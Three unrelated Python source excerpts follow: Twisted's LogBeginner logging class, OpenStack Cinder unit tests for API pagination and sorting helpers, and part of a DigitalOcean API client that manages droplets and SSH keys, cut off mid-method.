A L{LogBeginner} holds state related to logging before logging has begun,
and begins logging when told to do so. Logging "begins" when someone has
selected a set of observers, like, for example, a L{FileLogObserver} that
writes to a file on disk, or to standard output.
Applications will not typically need to instantiate this class, except
those which intend to initialize the global logging system themselves,
which may wish to instantiate this for testing. The global instance for
the current process is exposed as
L{twisted.logger.globalLogBeginner}.
Before logging has begun, a L{LogBeginner} will:
1. Log any critical messages (e.g.: unhandled exceptions) to the given
file-like object.
2. Save (a limited number of) log events in a
L{LimitedHistoryLogObserver}.
@ivar _initialBuffer: A buffer of messages logged before logging began.
@type _initialBuffer: L{LimitedHistoryLogObserver}
@ivar _publisher: The log publisher passed in to L{LogBeginner}'s
constructor.
@type _publisher: L{LogPublisher}
@ivar _log: The logger used to log messages about the operation of the
L{LogBeginner} itself.
@type _log: L{Logger}
@ivar _temporaryObserver: If not C{None}, an L{ILogObserver} that observes
events on C{_publisher} for this L{LogBeginner}.
@type _temporaryObserver: L{ILogObserver} or L{NoneType}
@ivar _stdio: An object with C{stderr} and C{stdout} attributes (like the
L{sys} module) which will be replaced when redirecting standard I/O.
@type _stdio: L{object}
"""
def __init__(self, publisher, errorStream, stdio, warningsModule):
self._initialBuffer = LimitedHistoryLogObserver()
self._publisher = publisher
self._log = Logger(observer=publisher)
self._stdio = stdio
self._warningsModule = warningsModule
self._temporaryObserver = LogPublisher(
self._initialBuffer,
FilteringLogObserver(
FileLogObserver(
errorStream, lambda event: formatEvent(event) + u"\n"
),
[LogLevelFilterPredicate(defaultLogLevel=LogLevel.critical)]
)
)
publisher.addObserver(self._temporaryObserver)
self._oldshowwarning = warningsModule.showwarning
def beginLoggingTo(
self, observers, discardBuffer=False, redirectStandardIO=True
):
"""
Begin logging to the given set of observers. This will:
1. Add all the observers given in C{observers} to the
L{LogPublisher} associated with this L{LogBeginner}.
2. Optionally re-direct standard output and standard error streams
to the logging system.
3. Re-play any messages that were previously logged to that
publisher to the new observers, if C{discardBuffer} is not set.
4. Stop logging critical errors from the L{LogPublisher} as strings
to the C{errorStream} associated with this L{LogBeginner}, and
allow them to be logged normally.
5. Re-direct warnings from the L{warnings} module associated with
this L{LogBeginner} to log messages.
@note: Since a L{LogBeginner} is designed to encapsulate the transition
between process-startup and log-system-configuration, this method
is intended to be invoked I{once}.
@param observers: The observers to register.
@type observers: iterable of L{ILogObserver}s
@param discardBuffer: Whether to discard the buffer and not re-play it
to the added observers. (This argument is provided mainly for
compatibility with legacy concerns.)
@type discardBuffer: L{bool}
@param redirectStandardIO: If true, redirect standard output and
standard error to the observers.
@type redirectStandardIO: L{bool}
"""
caller = currentframe(1)
filename, lineno = caller.f_code.co_filename, caller.f_lineno
for observer in observers:
self._publisher.addObserver(observer)
if self._temporaryObserver is not None:
self._publisher.removeObserver(self._temporaryObserver)
if not discardBuffer:
self._initialBuffer.replayTo(self._publisher)
self._temporaryObserver = None
self._warningsModule.showwarning = self.showwarning
else:
previousFile, previousLine = self._previousBegin
self._log.warn(
MORE_THAN_ONCE_WARNING,
fileNow=filename, lineNow=lineno,
fileThen=previousFile, lineThen=previousLine,
)
self._previousBegin = filename, lineno
if redirectStandardIO:
streams = [("stdout", LogLevel.info), ("stderr", LogLevel.error)]
else:
streams = []
for (stream, level) in streams:
oldStream = getattr(self._stdio, stream)
loggingFile = LoggingFile(
logger=Logger(namespace=stream, observer=self._publisher),
level=level,
encoding=getattr(oldStream, "encoding", None),
)
setattr(self._stdio, stream, loggingFile)
def showwarning(
self, message, category, filename, lineno, file=None, line=None
):
"""
Twisted-enabled wrapper around L{warnings.showwarning}.
If C{file} is C{None}, the default behaviour is to emit the warning to
the log system, otherwise the original L{warnings.showwarning} Python
function is called.
@param message: A warning message to emit.
@type message: L{str}
@param category: A warning category to associate with C{message}.
@type category: L{warnings.Warning}
@param filename: A file name for the source code file issuing the
warning.
        @type filename: L{str}
@param lineno: A line number in the source file where the warning was
issued.
@type lineno: L{int}
@param file: A file to write the warning message to. If C{None},
write to L{sys.stderr}.
@type file: file-like object
@param line: A line of source code to include with the warning message.
If C{None}, attempt to read the line from C{filename} and
C{lineno}.
@type line: L{str}
"""
if file is None:
self._log.warn(
"{filename}:{lineno}: {category}: {warning}",
warning=message, category=qual(category),
filename=filename, lineno=lineno,
)
else:
if sys.version_info < (2, 6):
self._oldshowwarning(message, category, filename, lineno, file)
else:
self._oldshowwarning(
message, category, filename, lineno, file, line
)
globalLogPublisher = LogPublisher()
globalLogBeginner = LogBeginner(globalLogPublisher, sys.stderr, sys, warnings)
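# Minimal usage sketch for the global beginner defined above, assuming the
# public twisted.logger API (textFileLogObserver writes formatted events to a
# file-like object):
#
#   import sys
#   from twisted.logger import Logger, globalLogBeginner, textFileLogObserver
#
#   globalLogBeginner.beginLoggingTo([textFileLogObserver(sys.stdout)])
#   Logger(namespace="example").info("logging has begun")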
|
|
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Test suites for 'common' code used throughout the OpenStack HTTP API.
"""
import mock
from testtools import matchers
import webob
import webob.exc
from oslo_config import cfg
from cinder.api import common
from cinder import test
NS = "{http://docs.openstack.org/compute/api/v1.1}"
ATOMNS = "{http://www.w3.org/2005/Atom}"
CONF = cfg.CONF
class LimiterTest(test.TestCase):
"""Unit tests for the `cinder.api.common.limited` method.
This method takes in a list of items and, depending on the 'offset'
and 'limit' GET params, returns a subset or complete set of the given
items.
"""
def setUp(self):
"""Run before each test."""
super(LimiterTest, self).setUp()
self.tiny = range(1)
self.small = range(10)
self.medium = range(1000)
self.large = range(10000)
def test_limiter_offset_zero(self):
"""Test offset key works with 0."""
req = webob.Request.blank('/?offset=0')
self.assertEqual(self.tiny, common.limited(self.tiny, req))
self.assertEqual(self.small, common.limited(self.small, req))
self.assertEqual(self.medium, common.limited(self.medium, req))
self.assertEqual(self.large[:1000], common.limited(self.large, req))
def test_limiter_offset_medium(self):
"""Test offset key works with a medium sized number."""
req = webob.Request.blank('/?offset=10')
self.assertEqual([], common.limited(self.tiny, req))
self.assertEqual(self.small[10:], common.limited(self.small, req))
self.assertEqual(self.medium[10:], common.limited(self.medium, req))
self.assertEqual(self.large[10:1010], common.limited(self.large, req))
def test_limiter_offset_over_max(self):
"""Test offset key works with a number over 1000 (max_limit)."""
req = webob.Request.blank('/?offset=1001')
self.assertEqual([], common.limited(self.tiny, req))
self.assertEqual([], common.limited(self.small, req))
self.assertEqual([], common.limited(self.medium, req))
self.assertEqual(
common.limited(self.large, req), self.large[1001:2001])
def test_limiter_offset_blank(self):
"""Test offset key works with a blank offset."""
req = webob.Request.blank('/?offset=')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_offset_bad(self):
"""Test offset key works with a BAD offset."""
req = webob.Request.blank(u'/?offset=\u0020aa')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_nothing(self):
"""Test request with no offset or limit."""
req = webob.Request.blank('/')
self.assertEqual(self.tiny, common.limited(self.tiny, req))
self.assertEqual(self.small, common.limited(self.small, req))
self.assertEqual(self.medium, common.limited(self.medium, req))
self.assertEqual(self.large[:1000], common.limited(self.large, req))
def test_limiter_limit_zero(self):
"""Test limit of zero."""
req = webob.Request.blank('/?limit=0')
self.assertEqual(self.tiny, common.limited(self.tiny, req))
self.assertEqual(self.small, common.limited(self.small, req))
self.assertEqual(self.medium, common.limited(self.medium, req))
self.assertEqual(self.large[:1000], common.limited(self.large, req))
def test_limiter_limit_bad(self):
"""Test with a bad limit."""
req = webob.Request.blank(u'/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_limit_medium(self):
"""Test limit of 10."""
req = webob.Request.blank('/?limit=10')
self.assertEqual(self.tiny, common.limited(self.tiny, req))
self.assertEqual(self.small, common.limited(self.small, req))
self.assertEqual(self.medium[:10], common.limited(self.medium, req))
self.assertEqual(self.large[:10], common.limited(self.large, req))
def test_limiter_limit_over_max(self):
"""Test limit of 3000."""
req = webob.Request.blank('/?limit=3000')
self.assertEqual(self.tiny, common.limited(self.tiny, req))
self.assertEqual(self.small, common.limited(self.small, req))
self.assertEqual(self.medium, common.limited(self.medium, req))
self.assertEqual(self.large[:1000], common.limited(self.large, req))
def test_limiter_limit_and_offset(self):
"""Test request with both limit and offset."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(items[1:4], common.limited(items, req))
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(items[3:1003], common.limited(items, req))
req = webob.Request.blank('/?offset=3&limit=1500')
self.assertEqual(items[3:1003], common.limited(items, req))
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual([], common.limited(items, req))
def test_limiter_custom_max_limit(self):
"""Test a max_limit other than 1000."""
items = range(2000)
req = webob.Request.blank('/?offset=1&limit=3')
self.assertEqual(
items[1:4], common.limited(items, req, max_limit=2000))
req = webob.Request.blank('/?offset=3&limit=0')
self.assertEqual(
items[3:], common.limited(items, req, max_limit=2000))
req = webob.Request.blank('/?offset=3&limit=2500')
self.assertEqual(
items[3:], common.limited(items, req, max_limit=2000))
req = webob.Request.blank('/?offset=3000&limit=10')
self.assertEqual([], common.limited(items, req, max_limit=2000))
def test_limiter_negative_limit(self):
"""Test a negative limit."""
req = webob.Request.blank('/?limit=-3000')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
def test_limiter_negative_offset(self):
"""Test a negative offset."""
req = webob.Request.blank('/?offset=-30')
self.assertRaises(
webob.exc.HTTPBadRequest, common.limited, self.tiny, req)
class PaginationParamsTest(test.TestCase):
"""Unit tests for `cinder.api.common.get_pagination_params` method.
This method takes in a request object and returns 'marker' and 'limit'
GET params.
"""
def test_nonnumerical_limit(self):
"""Test nonnumerical limit param."""
req = webob.Request.blank('/?limit=hello')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params,
req.GET.copy())
def test_no_params(self):
"""Test no params."""
req = webob.Request.blank('/')
expected = (None, CONF.osapi_max_limit, 0)
self.assertEqual(expected,
common.get_pagination_params(req.GET.copy()))
def test_valid_marker(self):
"""Test valid marker param."""
marker = '263abb28-1de6-412f-b00b-f0ee0c4333c2'
req = webob.Request.blank('/?marker=' + marker)
expected = (marker, CONF.osapi_max_limit, 0)
self.assertEqual(expected,
common.get_pagination_params(req.GET.copy()))
def test_valid_limit(self):
"""Test valid limit param."""
req = webob.Request.blank('/?limit=10')
expected = (None, 10, 0)
self.assertEqual(expected,
common.get_pagination_params(req.GET.copy()))
def test_invalid_limit(self):
"""Test invalid limit param."""
req = webob.Request.blank('/?limit=-2')
self.assertRaises(
webob.exc.HTTPBadRequest, common.get_pagination_params,
req.GET.copy())
def test_valid_limit_and_marker(self):
"""Test valid limit and marker parameters."""
marker = '263abb28-1de6-412f-b00b-f0ee0c4333c2'
req = webob.Request.blank('/?limit=20&marker=%s' % marker)
expected = (marker, 20, 0)
self.assertEqual(expected,
common.get_pagination_params(req.GET.copy()))
class SortParamUtilsTest(test.TestCase):
def test_get_sort_params_defaults(self):
"""Verifies the default sort key and direction."""
sort_keys, sort_dirs = common.get_sort_params({})
self.assertEqual(['created_at'], sort_keys)
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_override_defaults(self):
"""Verifies that the defaults can be overriden."""
sort_keys, sort_dirs = common.get_sort_params({}, default_key='key1',
default_dir='dir1')
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_value_sort_param(self):
"""Verifies a single sort key and direction."""
params = {'sort': 'key1:dir1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_value_old_params(self):
"""Verifies a single sort key and direction."""
params = {'sort_key': 'key1', 'sort_dir': 'dir1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
self.assertEqual(['dir1'], sort_dirs)
def test_get_sort_params_single_with_default_sort_param(self):
"""Verifies a single sort value with a default direction."""
params = {'sort': 'key1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
# Direction should be defaulted
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_single_with_default_old_params(self):
"""Verifies a single sort value with a default direction."""
params = {'sort_key': 'key1'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1'], sort_keys)
# Direction should be defaulted
self.assertEqual(['desc'], sort_dirs)
def test_get_sort_params_multiple_values(self):
"""Verifies multiple sort parameter values."""
params = {'sort': 'key1:dir1,key2:dir2,key3:dir3'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir2', 'dir3'], sort_dirs)
def test_get_sort_params_multiple_not_all_dirs(self):
"""Verifies multiple sort keys without all directions."""
params = {'sort': 'key1:dir1,key2,key3:dir3'}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
# Second key is missing the direction, should be defaulted
self.assertEqual(['dir1', 'desc', 'dir3'], sort_dirs)
def test_get_sort_params_multiple_override_default_dir(self):
"""Verifies multiple sort keys and overriding default direction."""
params = {'sort': 'key1:dir1,key2,key3'}
sort_keys, sort_dirs = common.get_sort_params(params,
default_dir='foo')
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'foo', 'foo'], sort_dirs)
def test_get_sort_params_params_modified(self):
"""Verifies that the input sort parameter are modified."""
params = {'sort': 'key1:dir1,key2:dir2,key3:dir3'}
common.get_sort_params(params)
self.assertEqual({}, params)
        params = {'sort_key': 'key1', 'sort_dir': 'dir1'}
common.get_sort_params(params)
self.assertEqual({}, params)
def test_get_sort_params_random_spaces(self):
"""Verifies that leading and trailing spaces are removed."""
params = {'sort': ' key1 : dir1,key2: dir2 , key3 '}
sort_keys, sort_dirs = common.get_sort_params(params)
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir2', 'desc'], sort_dirs)
def test_get_params_mix_sort_and_old_params(self):
"""An exception is raised if both types of sorting params are given."""
for params in ({'sort': 'k1', 'sort_key': 'k1'},
{'sort': 'k1', 'sort_dir': 'd1'},
{'sort': 'k1', 'sort_key': 'k1', 'sort_dir': 'd2'}):
self.assertRaises(webob.exc.HTTPBadRequest,
common.get_sort_params,
params)
class MiscFunctionsTest(test.TestCase):
def test_remove_major_version_from_href(self):
fixture = 'http://www.testsite.com/v1/images'
expected = 'http://www.testsite.com/images'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href(self):
fixture = 'http://www.testsite.com/v1.1/images'
expected = 'http://www.testsite.com/images'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_2(self):
fixture = 'http://www.testsite.com/v1.1/'
expected = 'http://www.testsite.com/'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_3(self):
fixture = 'http://www.testsite.com/v10.10'
expected = 'http://www.testsite.com'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_4(self):
fixture = 'http://www.testsite.com/v1.1/images/v10.5'
expected = 'http://www.testsite.com/images/v10.5'
actual = common.remove_version_from_href(fixture)
self.assertEqual(expected, actual)
def test_remove_version_from_href_bad_request(self):
fixture = 'http://www.testsite.com/1.1/images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
def test_remove_version_from_href_bad_request_2(self):
fixture = 'http://www.testsite.com/v/images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
def test_remove_version_from_href_bad_request_3(self):
fixture = 'http://www.testsite.com/v1.1images'
self.assertRaises(ValueError,
common.remove_version_from_href,
fixture)
class TestCollectionLinks(test.TestCase):
"""Tests the _get_collection_links method."""
def _validate_next_link(self, item_count, osapi_max_limit, limit,
should_link_exist):
req = webob.Request.blank('/?limit=%s' % limit if limit else '/')
link_return = [{"rel": "next", "href": "fake_link"}]
self.flags(osapi_max_limit=osapi_max_limit)
if limit is None:
limited_list_size = min(item_count, osapi_max_limit)
else:
limited_list_size = min(item_count, osapi_max_limit, limit)
limited_list = [{"uuid": str(i)} for i in range(limited_list_size)]
builder = common.ViewBuilder()
def get_pagination_params(params, max_limit=CONF.osapi_max_limit,
original_call=common.get_pagination_params):
return original_call(params, max_limit)
def _get_limit_param(params, max_limit=CONF.osapi_max_limit,
original_call=common._get_limit_param):
return original_call(params, max_limit)
with mock.patch.object(common, 'get_pagination_params',
get_pagination_params), \
mock.patch.object(common, '_get_limit_param',
_get_limit_param), \
mock.patch.object(common.ViewBuilder, '_generate_next_link',
return_value=link_return) as href_link_mock:
results = builder._get_collection_links(req, limited_list,
mock.sentinel.coll_key,
item_count, "uuid")
if should_link_exist:
href_link_mock.assert_called_once_with(limited_list, "uuid",
req,
mock.sentinel.coll_key)
self.assertThat(results, matchers.HasLength(1))
else:
self.assertFalse(href_link_mock.called)
self.assertThat(results, matchers.HasLength(0))
def test_items_equals_osapi_max_no_limit(self):
item_count = 5
osapi_max_limit = 5
limit = None
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_equals_osapi_max_greater_than_limit(self):
item_count = 5
osapi_max_limit = 5
limit = 4
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_equals_osapi_max_equals_limit(self):
item_count = 5
osapi_max_limit = 5
limit = 5
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_equals_osapi_max_less_than_limit(self):
item_count = 5
osapi_max_limit = 5
limit = 6
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_less_than_osapi_max_no_limit(self):
item_count = 5
osapi_max_limit = 7
limit = None
should_link_exist = False
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_limit_less_than_items_less_than_osapi_max(self):
item_count = 5
osapi_max_limit = 7
limit = 4
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_limit_equals_items_less_than_osapi_max(self):
item_count = 5
osapi_max_limit = 7
limit = 5
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_less_than_limit_less_than_osapi_max(self):
item_count = 5
osapi_max_limit = 7
limit = 6
should_link_exist = False
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_less_than_osapi_max_equals_limit(self):
item_count = 5
osapi_max_limit = 7
limit = 7
should_link_exist = False
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_less_than_osapi_max_less_than_limit(self):
item_count = 5
osapi_max_limit = 7
limit = 8
should_link_exist = False
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_greater_than_osapi_max_no_limit(self):
item_count = 5
osapi_max_limit = 3
limit = None
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_limit_less_than_items_greater_than_osapi_max(self):
item_count = 5
osapi_max_limit = 3
limit = 2
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_greater_than_osapi_max_equals_limit(self):
item_count = 5
osapi_max_limit = 3
limit = 3
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_greater_than_limit_greater_than_osapi_max(self):
item_count = 5
osapi_max_limit = 3
limit = 4
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_items_equals_limit_greater_than_osapi_max(self):
item_count = 5
osapi_max_limit = 3
limit = 5
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
def test_limit_greater_than_items_greater_than_osapi_max(self):
item_count = 5
osapi_max_limit = 3
limit = 6
should_link_exist = True
self._validate_next_link(item_count, osapi_max_limit, limit,
should_link_exist)
class LinkPrefixTest(test.TestCase):
def test_update_link_prefix(self):
vb = common.ViewBuilder()
result = vb._update_link_prefix("http://192.168.0.243:24/",
"http://127.0.0.1/volume")
self.assertEqual("http://127.0.0.1/volume", result)
result = vb._update_link_prefix("http://foo.x.com/v1",
"http://new.prefix.com")
self.assertEqual("http://new.prefix.com/v1", result)
result = vb._update_link_prefix(
"http://foo.x.com/v1",
"http://new.prefix.com:20455/new_extra_prefix")
self.assertEqual("http://new.prefix.com:20455/new_extra_prefix/v1",
result)
|
|
from __future__ import print_function, division, absolute_import
import requests
from doto.logger import log
from doto.config import Config
from doto.droplet import Droplet
from doto.image import Image
from doto.domain import Domain
from doto.connection import connection
from Crypto.PublicKey import RSA
import os
from os.path import join as pjoin
try:
os.path.expanduser('~')
expanduser = os.path.expanduser
except (AttributeError, ImportError):
# This is probably running on App Engine.
expanduser = (lambda x: x)
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
BASEURL = "https://api.digitalocean.com"
class connect_d0(object):
    def __init__(self, path=None, log_flag=True, client_id=None, api_key=None):
'''
:type path: string
:param path: path to valid doto credentials
:type log_flag: bool
:param log_flag: set logging on or off. Logging is on by default
:type client_id: string
:param client_id: client id credential
:type api_key: string
:param api_key: api key credential
'''
#logging is off when log.disabled is set to True
if not log_flag:
log.disabled = True
self.config = Config(path)
self._client_id = client_id or self.config.get('Credentials','client_id')
self._api_key = api_key or self.config.get('Credentials','api_key')
self._conn = connection(self._client_id, self._api_key)
def __str__(self):
return "DigitialOcean Connection Object"
def __repr__(self):
return "D0:Connected"
def _set_logging(self,debug=True):
"""
Convenience function to set logging on/off
"""
#logging is off when log.disabled is set to True
if not debug:
log.disabled = True
else:
log.disabled = False
def _pprint_table(self, data):
"""
pprint table: from stackoverflow:
http://stackoverflow.com/a/8356620
"""
table = []
for d in data:
table.append([unicode(v) for v in d.values()])
header = d.keys()
table.insert(0,header)
col_width = [max(len(x) for x in col) for col in zip(*table)]
for line in table:
print("| " + " | ".join("{:{}}".format(x, col_width[i])
for i, x in enumerate(line)) + " |")
def create_droplet(self,name=None,size_id=None,image_id=None,
region_id=None,ssh_key_ids=None,private_networking=None):
"""
Creates a droplet
:type name: string
:param name: The NAME of the droplet (name will be used as a reference
on D0's servers)
:type size_id: int
:param size_id: The ID corresponding to requested size of the image (see
connect_d0.get_sizes)
:type image_id: int
:param image_id: The ID corresponding to the requested image (see
connect_d0.images)
:type region_id: int
:param region_id: The ID corresponding to the requested region (see
connect_d0.region_id)
        :type ssh_key_ids: list or str
:param ssh_key_ids: An optional list of comma separated IDs corresponding
to the requested ssh_keys to be added to the server
(see connect_d0.get_ssh_keys)
        :type private_networking: bool
:param private_networking: An optional bool which enables a private network interface
if the region supports private networking
droplet = d0.create_droplet(name='Random',
size_id=66, #512MB
image_id=1341147, #Docker 0.7 Ubuntu 13.04 x64
region_id=1, #New York
ssh_key_ids=18669
)
"""
#ssh_key_ids check/convert to string
if isinstance(ssh_key_ids,(tuple,list)):
ssh_key_ids = ', '.join(str(key) for key in ssh_key_ids)
data = self._conn.request("/droplets/new",name=name,
size_id=size_id,image_id=image_id,
region_id=region_id,ssh_key_ids=ssh_key_ids,
private_networking=private_networking)
droplet = Droplet(conn=self._conn, **data['droplet'])
droplet.update()
droplet.event_update()
return droplet
# https://api.digitalocean.com/droplets/new?client_id=[your_client_id]&api_key=[your_api_key]&
    # name=[droplet_name]&size_id=[size_id]&image_id=[image_id]&region_id=[region_id]&ssh_key_ids=
# [ssh_key_id1],[ssh_key_id2]
def get_droplet_by_name(self, name):
"""
Convenience method to make it easy to select a droplet by name
"""
droplets = self.get_all_droplets()
for d in droplets:
if d.name == name:
return d
return None
def get_all_droplets(self,filters=None, status_check=None, table=False, raw_data=False):
"""
This method returns all active droplets that are currently running in your account.
All available API information is presented for each droplet.
https://api.digitalocean.com/droplets/?
client_id=[your_client_id]&api_key=[your_api_key]
:rtype: list
:return: A list of :class:`doto.Droplet`
"""
log.debug("Get All Droplets")
data = self._conn.request("/droplets",status_check)
if status_check:
return data
if raw_data:
return data
if table:
self._pprint_table(data['droplets'])
return
droplets = data['droplets']
if filters:
droplets = [Droplet(conn=self._conn, **drop) for drop in droplets]
for k,v in filters.iteritems():
droplets = filter(lambda x: v in getattr(x,k), droplets)
return droplets
#convert dictionary to droplet objects
return [Droplet(conn=self._conn, **drop) for drop in droplets]
def get_droplet(self, id=None, raw_data=False):
"""
This method returns full information for a specific droplet ID that is passed in the URL.
:type id: int
:param id: ID of the droplet
https://api.digitalocean.com/droplets/[droplet_id]?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/droplets/"+str(id))
if raw_data:
return data
#convert dictionary to droplet objects
return Droplet(conn=self._conn, **data['droplet'])
def get_sizes(self,status_check=None, table=False):
"""
This method returns all the available sizes that can be used to create a droplet.
https://api.digitalocean.com/sizes/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/sizes", status_check)
if status_check:
return data
sizes = data['sizes']
if table:
self._pprint_table(sizes)
return sizes
def get_all_regions(self,status_check=None, table=False):
"""
This method will return all the available regions within the DigitalOcean cloud.
        https://api.digitalocean.com/regions/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/regions", status_check)
if status_check:
return data
regions = data['regions']
if table:
self._pprint_table(regions)
return regions
def get_domains(self, status_check=None, table=False):
"""
This method returns all of your current domains.
https://api.digitalocean.com/domains/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/domains", status_check)
if status_check:
return data
domains = data['domains']
if table:
self._pprint_table(domains)
return domains
def get_all_ssh_keys(self, status_check=None, table=False):
"""
This method lists all the available public SSH keys in
your account that can be added to a droplet.
https://api.digitalocean.com/ssh_keys/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/ssh_keys", status_check)
if status_check:
return data
sshkeys = data['ssh_keys']
if table:
self._pprint_table(sshkeys)
return sshkeys
def create_key_pair(self, ssh_key_name=None, cli=False, dry_run=False):
"""
Method to create a key pair and store the public key on Digital Ocean's servers.
        SSH keys are stored in ~/.ssh/
NOTE: All key names are prepended with d0 to help disambiguate Digital Ocean keys
:type ssh_key_name: string
:param ssh_key_name: The name of the new keypair
        :type cli: bool
        :param cli: Set to True if you are using the cli utility and want the path defined
~/.ssh/my_new_key
:type dry_run: bool
:param dry_run: Set to True if the operation should not actually run.
:rtype: dict
:return: Dictionary of SSH key info and local path
https://api.digitalocean.com/ssh_keys/new/?name=[ssh_key_name]&ssh_pub_key=[ssh_public_key]&
client_id=[your_client_id]&api_key=[your_api_key]
"""
path, file = os.path.split(ssh_key_name)
file = 'd0_'+file
if not cli:
path = pjoin(expanduser('~'), '.ssh')
else:
path = expanduser(path)
if not os.path.isdir(path):
os.makedirs(path)
keyfile = pjoin(path, file)
key = RSA.generate(2048,os.urandom)
#public key
with open(keyfile+'.pub','w') as f:
f.write(key.exportKey('OpenSSH'))
public_key = key.exportKey('OpenSSH')
os.chmod(keyfile+'.pub', 0o0600)
#private key
with open(keyfile,'w') as f:
f.write(key.exportKey())
os.chmod(keyfile, 0o0600)
if dry_run:
return
data = self._conn.request("/ssh_keys/new/", name=file,
ssh_pub_key=public_key)
#include path to newly created file
data['ssh_key']['path'] = keyfile
log.debug(data['ssh_key'])
return data['ssh_key']
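    # Usage sketch (illustrative, not part of the original module): assuming
    # `d0` is an instance of this client, the call below writes
    # ~/.ssh/d0_mykey and ~/.ssh/d0_mykey.pub and registers the public key:
    #
    #     key_info = d0.create_key_pair(ssh_key_name='mykey')
    #     print(key_info['path'])
    #
    # With dry_run=True only the local key files are generated and nothing is
    # sent to DigitalOcean.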
def delete_key_pair(self, ssh_key_id=None):
"""
Delete the SSH key from your account.
:type ssh_key_id: int
:param ssh_key_id: The ID of the public key
https://api.digitalocean.com/ssh_keys/[ssh_key_id]/destroy/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
url = "/ssh_keys/%d/destroy" % (ssh_key_id)
data = self._conn.request(url)
log.debug(data)
def get_ssh_key(self, ssh_key_id=None):
"""
        Show a specific public SSH key in your account.
:type ssh_key_id: int
:param ssh_key_id: The ID of the public key
        https://api.digitalocean.com/ssh_keys/[ssh_key_id]/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
url = "/ssh_keys/%d" % (ssh_key_id)
        data = self._conn.request(url)
        log.debug(data)
        return data
def get_image_by_name(self, name):
"""
        Convenience method to make it easy to select an image by name
"""
images = self.get_all_images()
for img in images:
if img.name == name:
return img
return None
def get_all_images(self, filters=None, status_check=False, table=False, raw_data=False):
"""
Convenience method to get Digital Ocean's list of public images
        and the user's current private images,
        using EC2-style filtering
        https://api.digitalocean.com/images/?client_id=[your_client_id]&api_key=[your_api_key]
:type filters: dict
:param filters: Optional filters that can be used to limit the
results returned. Filters are provided in the form of a
dictionary consisting of filter names as the key and
filter values as the value. The set of allowable filter
names/values is dependent on the request being performed.
Check the DigitalOcean API guide for details.
:rtype: list
:return: A list of :class:`doto.Image` objects
https://api.digitalocean.com/images/?
client_id=[your_client_id]&api_key=[your_api_key]
"""
data = self._conn.request("/images", status_check)
if raw_data:
return data
if status_check:
return data
if table:
self._pprint_table(data['images'])
return
images = data['images']
if filters:
